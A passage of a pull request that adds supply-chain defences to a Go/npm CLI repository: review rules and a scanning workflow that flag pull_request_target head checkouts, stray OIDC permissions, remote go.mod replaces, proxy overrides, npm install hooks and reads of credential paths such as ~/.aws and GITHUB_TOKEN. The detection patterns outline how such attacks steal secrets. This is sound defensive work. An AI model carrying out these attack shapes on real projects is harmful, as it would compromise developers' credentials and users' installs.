         "rule": "For PRs adding this manifest, the PR body must follow the publish-skill template: ## <slug> heading, **API:** … | **Category:** … | **Press version:** … line, **Spec:** line, ### CLI Shape with --help output, ### What This CLI Does, ### Manuscripts, ### Validation Results table, optionally ### Publication Path / ### Novel Commands / ### Gaps. Flag bodies that use generic ## Summary / ## Why This Matters / ## What It Does / ## Endpoints / ## Test plan templates instead."
+      },
+      {
+        "scope": [".github/workflows/**"],
+        "rule": "P0. A workflow that combines a pull_request_target trigger with a checkout step whose ref points at PR-head code (github.event.pull_request.head.sha, github.event.pull_request.head.ref, or refs/pull/<n>/merge) is the TanStack mini-Shai-Hulud attack shape — head code runs with base-context secrets and OIDC tokens, which attackers exfiltrate from runner memory. The repo's existing pull_request_target workflows (greptile-policy-gate.yml) make API calls only and do not check out PR head; new workflows must follow that posture. Flag any new pull_request_target workflow that overrides the checkout ref. Recommend switching to pull_request, or removing the ref override so checkout defaults to the base commit."
+      },
+      {
+        "scope": [".github/workflows/**"],
+        "rule": "P0. id-token: write mints OIDC tokens consumers use to publish to npm, AWS, Sigstore, etc. It must appear only in workflows that actually publish. In this repo the sole allowlist entry is .github/workflows/npm-publish.yml (OIDC Trusted Publishing for @mvanhorn/printing-press). Any new workflow granting id-token: write outside that allowlist is the TanStack OIDC-theft attack shape. Flag and recommend either removing the permission or consolidating publishing logic into the allowlisted workflow."
+      },
+      {
+        "scope": ["library/**/go.mod"],
+        "rule": "P0 for remote targets; P1 for local. A new `replace` directive in a library CLI's go.mod can silently redirect every `go install` consumer (BufferZoneCorp attack shape). Two tiers: targets pointing at a URL or remote module path (github.com/..., gitlab.com/..., https://..., any host segment with a dot) are P0 — block until reverted or explicitly justified. Targets pointing at a local path (./..., ../...) are P1 advisory — legitimate vendoring exists in this repo (library/food-and-dining/ordertogo/go.mod has three local-vendoring replaces) but every new local replace deserves a sanity check that the local target is also checked into the PR and recorded in .printing-press-patches.json."
+      },
+      {
+        "scope": [".github/workflows/**"],
+        "rule": "P0. Setting GOPROXY, GOFLAGS, GONOSUMCHECK, GOSUMDB, or GONOSUMDB inside a workflow env block (workflow, job, or step level) lets PR authors redirect Go module resolution to an attacker proxy or suppress checksum verification (BufferZoneCorp attack shape). The repo does not use any of these overrides on origin/main as of 2026-05-17; new ones are forward-looking attack vectors. Flag any addition and recommend configuring private proxies at the org/runner level under operator review instead."
+      },
+      {
+        "scope": ["npm/package.json"],
+        "rule": "P0. Adding preinstall, postinstall, or prepare scripts to npm/package.json is the Axios and TanStack attack shape — lifecycle hooks fire on every `npm install` and `npx -y @mvanhorn/printing-press install ...` invocation, running attacker code in user shells. The npm wrapper's existing scripts (build, clean, test, prepublishOnly) are all CI-only and unaffected. Flag any new lifecycle script and recommend moving build logic to CI, not user-machine install hooks."
+      },
+      {
+        "scope": ["library/**/go.mod"],
+        "rule": "P0. The `module` directive in library/<cat>/<slug>/go.mod is the canonical module path used by `go install` and the registry generator. It must remain prefixed with github.com/mvanhorn/printing-press-library/library/. A PR that rewrites an existing CLI's module directive to a non-canonical path silently redirects every future install (BufferZoneCorp variant). Renaming or moving a published CLI is a generator-repo operation, not a manual go.mod edit. Flag any module directive change on an existing CLI that breaks the canonical prefix."
+      },
+      {
+        "scope": ["library/**/internal/**/*.go", "library/**/cmd/**/*.go"],
+        "rule": "Judge whether the CLI's purpose plausibly explains any credential-path read. Patterns to weigh: literal strings or os.Getenv calls for ~/.aws, ~/.ssh, ~/.kube, ~/.claude, ~/.vscode (the node-ipc and TanStack persistence/exfil paths), or env vars AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN, ACTIONS_ID_TOKEN_REQUEST_URL, GITHUB_TOKEN, NPM_TOKEN. A CLI named aws-* reading .aws/credentials is fine; a weather or trade-tracker CLI doing the same is the node-ipc credential-harvesting shape. Flag P0 when the read is incongruous with the CLI's documented purpose (read SKILL.md, README.md, and .printing-press.json display_name to judge). No CLI in this catalog should write to ~/.claude/ or ~/.vscode/ — those were the TanStack persistence sinks; flag any write there regardless of CLI purpose."
       }
     ],
     "other": [


### PR DESCRIPTION
## Summary

Adds layered PR-time defenses against the supply-chain attack shapes observed in four real-world incidents (March–May 2026): Axios, TanStack mini-Shai-Hulud, node-ipc, and BufferZoneCorp. Cross-repo mirror lands in [mvanhorn/cli-printing-press](https://github.com/mvanhorn/cli-printing-press) as mvanhorn/cli-printing-press/pull/1619

## What this PR does

Two layers, applied to every PR touching `.github/workflows/**`, `library/**/go.mod`, or `npm/package.json`:

1. **`verify-supply-chain.yml`** — deterministic Python scan at `.github/scripts/verify-supply-chain/scan.py` (with `signals.py` pattern catalog and `scan_test.py` covering 41 unit + integration tests). Hard-fails on block-tier signals:
   - `pull_request_target` workflow that checks out PR head ref (TanStack OIDC theft)
   - `id-token: write` outside `npm-publish.yml` allowlist
   - New `replace` directive in `library/**/go.mod` pointing at a remote URL (BufferZoneCorp)
   - `GOPROXY` / `GOFLAGS` / `GONOSUMCHECK` overrides in workflow env
   - `postinstall` / `preinstall` / `prepare` added to `npm/package.json` (Axios)
   - `module` directive drift on an existing CLI's `go.mod` (catalog variant of BufferZoneCorp)
   - Local-path `replace` directives emit **advisory** notices only — `library/food-and-dining/ordertogo/go.mod` has three legitimate ones; the diff-aware scan only flags newly-added ones.

2. **Seven new `greptile.json` rules** covering the same signals plus a judgment-only rule for Go-source credential-path reads in `library/**/internal/**/*.go` and `library/**/cmd/**/*.go` (catches the node-ipc shape when a CLI's purpose doesn't explain the read).

Plan: [docs/plans/2026-05-17-001-feat-supply-chain-hardening-plan.html](docs/plans/2026-05-17-001-feat-supply-chain-hardening-plan.html)
Rationale & primary sources: [docs/solutions/security/2026-05-supply-chain-hardening.md](docs/solutions/security/2026-05-supply-chain-hardening.md)
AGENTS.md addition under "Supply-chain hardening" (after the existing Greptile section).

## Current state audit

Performed against fresh `origin/main` as of 2026-05-17:

- ✅ Only `pull_request_target` workflow in repo (`greptile-policy-gate.yml`) is safe — API calls only, no checkout of PR head, no `id-token`.
- ✅ `id-token: write` grants only in `npm-publish.yml` (the OIDC Trusted Publishing allowlist).
- ✅ No `GOPROXY` / `GOFLAGS` / `GONOSUMCHECK` overrides in any workflow.
- ✅ Existing `replace` directives in `library/food-and-dining/ordertogo/go.mod` are all local vendoring (`./third_party/...`) — these are advisory, not blocking, and the scan is diff-aware so they don't trip on unrelated PRs.
- ✅ Every spot-checked `library/**/go.mod` uses canonical `module github.com/mvanhorn/printing-press-library/library/<cat>/<slug>`.

All new rules are forward-looking gates; no existing code needs to change for them to clear.

## Rollout posture

This workflow runs **informationally** on landing — see plan KD7. After a one-week green window with no false-positive miscalibration on real PRs, promote to a required check via branch protection.

## Test plan

- [x] 41 unit + integration tests pass: `cd .github/scripts/verify-supply-chain && python3 -m unittest scan_test`
- [x] Scan against `origin/main` produces zero findings (no regression on existing tree)
- [x] All four motivating attack shapes are covered by test fixtures (TanStack, Axios, BufferZoneCorp remote+local, node-ipc-class credential reads)
- [ ] Sandbox PR with each attack shape produces the expected red workflow + Greptile P0 — to be exercised in the one-week informational window before promoting to required check.

## Linked work

- Cross-repo mirror: PR B at [mvanhorn/cli-printing-press#1619](https://github.com/mvanhorn/cli-printing-press/pull/1619).
- Primary sources cited in the solutions doc: Datadog ([Axios](https://securitylabs.datadoghq.com/articles/axios-npm-supply-chain-compromise/)), Socket.dev ([TanStack](https://socket.dev/blog/tanstack-npm-packages-compromised-mini-shai-hulud-supply-chain-attack)), Microsoft ([Axios mitigation](https://www.microsoft.com/en-us/security/blog/2026/04/01/mitigating-the-axios-npm-supply-chain-compromise/)), The Hacker News ([BufferZoneCorp](https://thehackernews.com/2026/05/poisoned-ruby-gems-and-go-modules.html), [TanStack at OpenAI](https://thehackernews.com/2026/05/tanstack-supply-chain-attack-hits-two.html)), Security Arsenal ([BufferZoneCorp deep dive](https://securityarsenal.com/blog/bufferzonecorp-supply-chain-attack-poisoned-ruby-and-go-modules-targeting-ci-pipelines)).